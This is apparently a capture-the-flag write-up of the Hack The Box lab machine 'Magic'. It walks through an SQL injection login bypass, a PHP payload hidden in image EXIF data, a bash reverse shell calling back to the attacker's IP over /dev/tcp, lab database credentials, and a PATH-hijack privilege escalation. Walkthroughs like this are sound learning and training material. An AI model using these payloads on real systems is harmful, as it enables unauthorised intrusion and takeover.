Write up for Magic (10.10.10.185) Medium level box.

By: Gluonsrgreat

The Initial nmap scan gives us a pretty clear avenue as to what to go after:

Looks like were gonna do some web enumeration.

Loading up the address in your web browser we get this web page:

Seems to be a basic image hosting site, but whats this? An login link so we can upload images? We might be able to utilize RFI to get our initial shell.

Looking at the login link we see a webpage, but can be easily be bypassed with some simple sql injection

Easy enough we put in “` or 1=1#” in for the username which basically sets username to true so we can put anything we want for the password.

I tried to upload your typical PHP reverse shell file, but No luck the server doesn’t allow anything but image formats!.

Looks like we are gonna have to get clever. After some failed attempts a friend sent me this interesting article https://null-byte.wonderhowto.com/how-to/upload-shell-web-server-and-get-root-rfi-part-1-0162818/ . Utilizing a tool I had never used before.

The idea is to put a PHP payload in the EXIF data of the image and then rename the image imagename.php.png to force the website to view the EXIF data as php.

Lets try it out.

We Rename the image download.php.png

Annnnnnnnnnnnnnnd Success!

Now we can see from viewing the other images on the webserver that the images are uploaded to:

Now the payload I entered takes commands in the command parameter and executes them on the server like so.

We have achieved Remote Command Execution in the server!

Now we use this to upload our selected shell.

I made a shell on my Desktop with the following:

<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.200/1234 0>&1′”);

I did it by download a simple one onto my Desktop and then using the SimpleHTTPServer module in python to start a HTTP server and in turn use wget to upload the file to the server

We then just request the shell so it can run and setup my listener for my selected reverse shell

Cool we now have a shell, but we don’t have user yet

We are www-data, a user dedicated with the management and running of web services however in the /home directory we can see the user we need to become

Navigating to the home directory we can see two directories Magic and html.

Navigating into Magic we see the following

Most of these files seem like typical webserver bullshit. But whats db.php5?

Here we go, cat-ing the file we see:

<?php
class Database
{
private static $dbName = ‘Magic’ ;
private static $dbHost = ‘localhost’ ;
private static $dbUsername = ‘theseus’;
private static $dbUserPassword = ‘iamkingtheseus’;

private static $cont = null;

public function __construct() {
die(‘Init function is not allowed’);
}

public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( “mysql:host=”.self::$dbHost.”;”.”dbname=”.self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}

public static function disconnect()
{
self::$cont = null;
}
}

we see a user name and password for theseus! The user we need to become

but trying the password iamkingtheseus we get no luck

Seems theseus did the smart thing and did reuse a password. Unfortunately that’s bad news for us.

It seems db.php5 involves requests to a sql server listening only to local host from reading the above code. Lets check it out

From that we get the following:

— MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)

— Host: localhost Database: Magic

— ——————————————————

— Server version 5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;

/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;

/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;

/*!40101 SET NAMES utf8 */;

/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;

/*!40103 SET TIME_ZONE=’+00:00′ */;

/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;

/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;

/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE=’NO_AUTO_VALUE_ON_ZERO’ */;

/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

— Current Database: `Magic`

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `Magic`;

— Table structure for table `login`

DROP TABLE IF EXISTS `login`;

/*!40101 SET @saved_cs_client = @@character_set_client */;

/*!40101 SET character_set_client = utf8 */;

CREATE TABLE `login` (

`id` int(6) NOT NULL AUTO_INCREMENT,

`username` varchar(50) NOT NULL,

`password` varchar(100) NOT NULL,

PRIMARY KEY (`id`),

UNIQUE KEY `username` (`username`)

) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;

/*!40101 SET character_set_client = @saved_cs_client */;

— Dumping data for table `login`

LOCK TABLES `login` WRITE;

/*!40000 ALTER TABLE `login` DISABLE KEYS */;

INSERT INTO `login` VALUES (1,’admin’,’Th3s3usW4sK1ng’);

/*!40000 ALTER TABLE `login` ENABLE KEYS */;

UNLOCK TABLES;

/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;

/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;

/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;

/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;

/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

— Dump completed on 2020-04-21 23:24:07

Looks like we have another password

INSERT INTO `login` VALUES (1,’admin’,’Th3s3usW4sK1ng’);

maybe this password will allow us to become theseus

And Success!

Now Navigate to “/home/theseus” and open user.txt for your flag!

We are not done though we still need to get the super user or root.

Were gonna upload my personal favorite linux enumeration script, linux smart enum or lse.sh

Running the script we find a couple interesting things

These are suid binaries or files that can be executed with the permissions of the person the wrote the file. In this case root. Hmm looking at GTFObins doesn’t give us anything interesting. Lets see what happens when we execute sysinfo on its own with pspy.

Pspy is a tool that allows one to monitor linux processes without having to be root.

Lets have a look

Interesting

Whenever we run sysinfo we see that root runs lshw. Hmm. Maybe we can fool the system into running a fake lshw file.

A brief explanation:

Whenever you run a command on linux it looks through certain directories in the PATH variable for that particular binary you want to run. Once it finds it it runs the binary. If we can modify the Path so that we can have a directory with our fake lshw file in front of the legitimate directories it will run whatever code we want in our fake lshw file.

More in depth explanation here:

So what were gonna do is create a fake lshw file

As you can see this will run a reverse shell connecting back to our kali machine.

Now we need to edit the path so that our fake lshw file is the first the system sees when trying to find lshw

So cool now we have a new PATH

all we need to do now is run sysinfo

And we are done

go to “/root/root.txt” to claim your flag

And thats Magic all in all a pretty good box

Leave a Reply

Your email address will not be published. Required fields are marked *

Close
Menu